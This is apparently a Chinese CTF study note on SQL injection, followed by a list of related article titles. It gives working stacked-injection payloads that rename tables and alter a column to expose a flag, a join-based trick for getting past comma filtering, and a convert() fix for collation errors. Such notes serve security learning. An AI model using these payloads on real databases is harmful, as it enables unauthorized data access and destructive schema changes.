二次注入
(待补充)
堆叠注入(禁用select|update|delete|drop|insert|where)
多个语句同时执行
如:
1‘;show databases;
将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1’ or 1=1 #得到flag
1‘;rename tables words to words1;rename tables 1919810931114514
to words; alter table words change flag id varchar(100);#
之后利用 1‘ or ‘1‘=‘1 爆出flag
逗号过滤
如:
select 1,2 回显select 1
可通过 select * from (select 1)a join (select 2)b
数据库本身编码问题
报错:Illegal mix of collations for operation ‘UNION’
可以用convert()进行编码转换
如group_concat(convert(TABLE_NAME using gbk))
相关文章
- 12-10spring 配置bean的方法及依赖注入发方式
- 12-10渗透测试----SQL注入~web日志分析thinkphp漏洞及duplicate报错注入
- 12-10文件特殊权限及常用方式
- 12-10spring依赖注入方式及springBoot如何解决循环依赖
- 12-10JPA 下使用原生sql,参数传递及使用方式以及JPQL参数传递使用方式
- 12-10SQL注入实战及漏洞网站搭建
- 12-10WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
- 12-10安全测试-安装 sqli-labs 靶场及Sql注入原理、手动、自动注入、检测及防御
- 12-10superforming的sql-labs大通关之第二部分(第11~16关)解析及注入方法
- 12-10sql注入之查询方式及报错注入